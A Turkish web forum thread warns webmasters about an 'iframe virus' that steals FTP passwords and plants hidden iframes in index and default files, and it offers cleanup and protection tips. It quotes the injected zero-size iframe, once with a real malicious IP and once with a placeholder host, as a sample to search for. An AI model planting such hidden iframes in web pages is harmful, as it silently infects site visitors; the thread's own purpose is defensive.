6 sonuçtan 1 ile 6 arası
  1. #1

    SİTE KURUCUSU
    Array
    Üyelik tarihi
    31.07.2005
    Yer
    Siirt
    Yaş
    40
    Mesajlar
    13.496
    Tecrübe Puanı
    10

    Standart iframe virüsü

    Yeni çıkan Ve Tehlike Arz Eden Bir Virus

    Son zamanlarda büyük hızla yolunda yüreyen yeni virüs bir çok webmasterlerin sorunu oldu ve olmayada devam ediyor..

    Bu virüs bir kere bilgisayarınıza bulaştıktan sonra o bilgisayarla hangi sitenin ftp'ini açarsanız açın girdiğiniz ftp bilgilerini kaydederek, sitelere girip index.php , index.html , index.htm , default.asp 'in içlerine iframe kodu atiyor
    atılan iframe kodu şu şekildedir..


    Kod:
    <iframe src='http://81.95.145.240/logo/index.php' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 
    FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
    Ve Sadece www/public htm/ dizinine değil diğer bütün klasörülerin içinde bulunan index.php , index.html , index.htm , default.asp 'in ve diğer php dosyalarının içine de atıyor..

    Şimdiye kadar bir çok başlık gördüm bu şekilde bu virüslerden yakınan o yüzden bu yazıyı yazma gereği duydum...

    Virüs size nasıl bulaşır ?

    başka kişinin sitesine bulaşmışsa ve sizde o siteye girdiyseniz üstelik hiç bir antivirüs yüklü değilse bilgisayarınıza;
    Bilinki o virüs artık sizinde bilgisayarınızda ve girdiğiniz bütün ftp'lere girmeye başlayacaktır..

    Peki Virüs Sizin Bilgisayarınıza Bulaştı ve bunun farkına vardınız ne yapmamız gerekir ?

    Sadece ftp bilgilerinizi alabildiği için hemen dosyalarınızı pc'ye atıp içindeki iframe kodlarını silin ve tekrar ftp'den
    upload edin. Sonra hiç vakit kaybetmeden cpanel/plesk panelinize girin ve şifrenizi değiştirin.
    Bu işlemleri yaptıktan sonra sakın ftp'den giriş yapmayın. Çünkü ftp'den giriş yaptığınızda değiştirdiğiniz şifreyide alarak tekrar dosyalarıza iframe atmaya başlayacaktır.. Bu işlemleride yaptıktan sonra bilgisayarıza format atin..

    Virüs Bana bulaşmadı Nasıl korunabilirim ?

    Filezilla veya cuteftp kullanarak serverinize bağlanın, index.php ,index.htm, index.html, default.asp Bütün klasörlerdeki bu saydığım uzantılı sayfalarınızın chmod değerlerini 444 yapın. Bilgisayarınıza Nod32, Panda veya Kaspersky kurun (ben Kaspersky kullanıyorum ve çoğu sitede virüs yakaladı ama bana bulaşmadı) Bilgisayarınızı güvene alın.

    Her ftpye girdikten sonra direk cpanelden yada plesk paneden girerek ftp şifrenizi değiştirin.

    Birde bilgisayarınıza Ad-Aware SE Personal 'i kurun iki günde bir tarama yaptırın.

    ************************************************** ********

    Herhangi bir web sayfanızdan virüs önce bilgisayarınıza sızıyor ve daha sonra
    FTP benzeri program ile sitenize bulaşıyor. Haliyle bu şekilde her yere yayılmaya başlıyor.
    virüs bi süre sonra masaüstünüze update.exe diye bi virüs ekleyip pc'ye zarar vermeye başlıyormuş.

    Çözüm için ne yapabiliriz?
    Öncelikle ilgisayarınızda dosya bulma menüsünden cd Win.Agent.pz(ntos.exe) bulduğunuzda hemen silin. Daha sonra antitrojan ve antivirüsler ile bilgisayarınızı tarayın.

    Bu işlemlerden sonra FTP'yi kullanıp dosyaları kontrol edin.

    Diğer bir alternatif olarak;
    Sitenizde bulunan dosyaları FTP yoluyla bilgisayarınıza indirip belirtilen
    iframe kodlarının olup olmadığını kontrol kontrol ederek virüs taramasından geçirin.

    Güvende olduğunuzu hissediyorsanız Daha sonra dosyaları FTP'den tekrar sitenize atın.

    Yada Cute FTP kullanıyorsanız Ctrl-F kısayılu ile arama menüsünü açarak
    sitenizte 81.95.145.240 ip numarasını arayın.

    işlem sonucu dosyaların cmod ayarlarını kontrol ederek ilgili dosyaların ayarlarını 444 yapın.

    Ayrıca tarayıcı olarak Firefox kullanmanın bu tip saldırıları önleyeceğini düşünüyorum.

    ALINTIDIR

  2. #2

    SİTE KURUCUSU
    Array
    Üyelik tarihi
    31.07.2005
    Yer
    Siirt
    Yaş
    40
    Mesajlar
    13.496
    Tecrübe Puanı
    10

    Standart

    Bu virüsle 2 aydan fazla oldu boğuşuyorum. ve ne yazıkki hala kurtulabilmiş değilim. Şuan sadece ftp bilgilerini alabilen bu iframe virüsü yakında mail, site giriş şifrelerini de hafıza alıp dağıtabilir.

    Tecrübelerime dayanarak bir kaç öneride bulunacağım.

    Sitelere girerken;

    googleden aratıp girin. Google'den aradığınızda; bu site bilgisayarınıza zarar verebilir diyorsa, sakın girmeyin...

  3. #3

    SİTE KURUCUSU
    Array
    Üyelik tarihi
    31.07.2005
    Yer
    Siirt
    Yaş
    40
    Mesajlar
    13.496
    Tecrübe Puanı
    10

    Standart

    Web sitelerini tehdit eden IFRAME Virüsü


    iframe virüsü


    Bir süredir yaygınlaşmaya başlayan ve pek çok Web sitesinin olumsuz etkilendiği IFRAME Virüsü hakkında sizi bilgilendirmek istiyoruz.

    IFRAME Virüsü nedir?

    Virüslü bilgisayarlardan FTP girişi yapılan sitelerin index, default ve/veya tüm dosyalara zararlı bir IFRAME kodu yerleştirir. Virüs, sitenize giren kullanıcıların bilgisayarlarına virüs bulaştırmayı amaçlamaktadır.

    Zararlı IFRAME Virüsü sitelere genellikle FTP üzerinden bulaşmaktadır.

    Nasıl bulaşır :

    1. Saldırgan öncelikle güncel antivirus yazılımları ile korunmayan bilgisayarınıza bir virus bulaştırır.

    2. Bilgisayarınıza Bulaştırılan virüsun amacı bilgisayarınızdaki FTP Programında şifrenin saklandığı dosyayı ve/veya ftp şifrenizi çalmaktır . FTP bilgileri çalındıktan sonra, saldırgan dilediği zaman ftp girişi yapıp, sitenizin index.*, default.* veya tüm dosyalarınızın html taglarının arasına (genellikle sayfanın sonuna) iftame veya script tagı yerleştirir.

    IFRAME tagı sayfanızın html tagları arasında gizlenir. Sayfanızı ziyaret eden kullanıcılara virus bulaştırmayı amaçlamaktadır.

    IFRAME Virüsü sitenizdeki php, asp veya asp.net kod açıklarından da bulaşabilir. Sitenizdeki dosya ve klasörlerin yazma izinlerinin açık olmasını kullanarak dosyalarınıza bulaşabilir.

    IFRAME kod örnekleri:

    < I FRAME src= ’ http:// siteadresi/index.php’ style=’border:0px solid gray;’ WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no>< / I FRAME>
    Korunmak için yapmanız gerekenler:

    1. FTP şifrenizi değiştiriniz.
    2. Bilgisayarınızda güncel bir antivirüs yazılımı kullanınız.
    3. FTP şifrenizi otomatik girişe ayarlamayın veya FTP girişlerinden sonra şifrenizi değiştiriniz.
    4. IFRAME Virüsü sitenizdeki php, asp veya asp.net kod açıklarından bulaşmış olabilir. Bundan korunmak için kontrol panelinizden dosyalarınızın yazma izinlerini kaldırınız, sadece gerekli dosya veya klasörlerinize yazma izni veriniz. Linux sunucularımızdan hizmet alıyorsanız FTP programınızdan özellikle index.* ve default.* dosya izinlerini 444 (read/okuma) olarak ayarlayınız.

    Sitelerinizi kontrol ediniz:

    Sitenizdeki index.*, default.* dosyalarını bilgisayarınıza indirip html kodlarını gözden geçiriniz. Index.* ve/veya default.* dosyalarınız temiz ise virüs bulaşmamış demektir. Virüs öncelikle bu dosyalara bulaşır. Ancak yine de diğer doslarınızın güncellenme tarihlerini gözden geçiriniz.

    Zararlı kod bulaşmış dosyalarınızı temizleyiniz.

    IFRAME Virüsü bulaşan siteler Google arama motoru ve Firefox tarayıcısı tarafından saldırgan site olarak sınıflandırılır. Bu sitelere giriş izni verilmez.

    Siteniz Google’da saldırgan site olarak listeleniyorsa:

    IFRAME Virüsü bulunan site google arama sonuçlarında saldırgan site olarak gösterilir. Bunu düzeltmek için şunları yapabilirsiniz:

    1. http://www.google.com/webmasters/tools/ adresine giriş yapınız.
    2. Gmail hesabınız veya yeni bir hesap ile giriş yapınız.
    3. Sitenizi ekleyerek doğrulayınız.
    4. Sitenizi doğruladıktan sonra, kötü amaçlı yazılım uyarısına tıklayarak, zararlı kodların bulaştığı sayfaları görün ve sayfalarınızdan zararlı kodları temizleyin.
    5. Sol menüden “Siteyi tekrar değerlendirme” seçeneğine tıklayın …
    6. Sitenizde bulunan zararlı kodları kaldırdığınızı ve tekrar değerlendirmelerini rica ediniz.
    7. Siteniz birkaç gün içinde saldırgan site olmaktan çıkarılacaktır !

    kaynak: Web sitelerini tehdit eden IFRAME Virüsü | Tr Turkey Turkiye&#039;in Kalbi Burada

  4. #4
    PRENSES Array
    Üyelik tarihi
    11.02.2009
    Mesajlar
    2.695
    Tecrübe Puanı
    67

    Standart

    bilgi için tskrler adminim ayrıca öneriniz içinde...
    bundan böyle yasasın google =)))
    Ah benim sevdasında bencil, yüreğinde sağlam sevdiğim. Aklıma gelişini seveyim. Ne güzel de darma duman ediyorsun beni.

  5. #5

    SİTE KURUCUSU
    Array
    Üyelik tarihi
    31.07.2005
    Yer
    Siirt
    Yaş
    40
    Mesajlar
    13.496
    Tecrübe Puanı
    10

    Standart

    google crome farkını bu akşam bir kez daha yaşıyorum.

    dün itibariyle bir çok site, yine iframe virüsü yedi ve İE7'ler (microsoft internet explorer 7) bu virüsü göremiyorlar. 1-2 hafta sonra bu virüsü google görecek. Ama Google Chrome ile internete bağlananlar sitelere girdiğinde derhal uyarı mesajı geliyor. O site virüs yememiş olsa bile, sitedeki başka bir site linkinde virüs varsa, yani bizim site anasayfasında reklamlar var. O reklamlar bazı site reklamlarına gidiyor. O siteler iframe yemişse eğer, google chrome siteye girmeye izin vermiyor. Bu site zararlı bir sitenin reklamını yapıyor diyor ve engelliyor.

    Bu nedenle derhal google chrome yüklemenizi öneriyorum. script engelleme özelliği ile virüsten de koruyacaktır sizleri.

  6. #6
    Teğmen Array
    Üyelik tarihi
    07.04.2008
    Mesajlar
    52
    Tecrübe Puanı
    14

    Standart

    Alıntı RoHaN Nickli Üyeden Alıntı Mesajı göster
    google crome farkını bu akşam bir kez daha yaşıyorum.

    dün itibariyle bir çok site, yine iframe virüsü yedi ve İE7'ler (microsoft internet explorer 7) bu virüsü göremiyorlar. 1-2 hafta sonra bu virüsü google görecek. Ama Google Chrome ile internete bağlananlar sitelere girdiğinde derhal uyarı mesajı geliyor. O site virüs yememiş olsa bile, sitedeki başka bir site linkinde virüs varsa, yani bizim site anasayfasında reklamlar var. O reklamlar bazı site reklamlarına gidiyor. O siteler iframe yemişse eğer, google chrome siteye girmeye izin vermiyor. Bu site zararlı bir sitenin reklamını yapıyor diyor ve engelliyor.

    Bu nedenle derhal google chrome yüklemenizi öneriyorum. script engelleme özelliği ile virüsten de koruyacaktır sizleri.
    Güzel Teşhis bence


 

Benzer Konular

  1. Dikkat ! CIH (Cernobil) virüsü nedir?
    By Adßlue4you in forum BİLİŞİM HABER DÜNYASI
    Cevaplar: 2
    Son Mesaj: 24.03.2009, 10:13
  2. Laz Virüsü
    By !SheKer! in forum FIKRA ALEMİ
    Cevaplar: 1
    Son Mesaj: 22.04.2008, 15:01
  3. Dünyanın İlk Bilgisayar Virüsü 25 Yaşında
    By rallici_56 in forum BİLİŞİM HABER DÜNYASI
    Cevaplar: 6
    Son Mesaj: 09.09.2007, 22:32
  4. msn virüsü yayılmaya başladı
    By qadirjan in forum MESSENGER & E-MAİL
    Cevaplar: 0
    Son Mesaj: 03.03.2007, 11:03

Yetkileriniz

  • Konu Acma Yetkiniz Yok
  • Cevap Yazma Yetkiniz Yok
  • Eklenti Yükleme Yetkiniz Yok
  • Mesajınızı Değiştirme Yetkiniz Yok
  •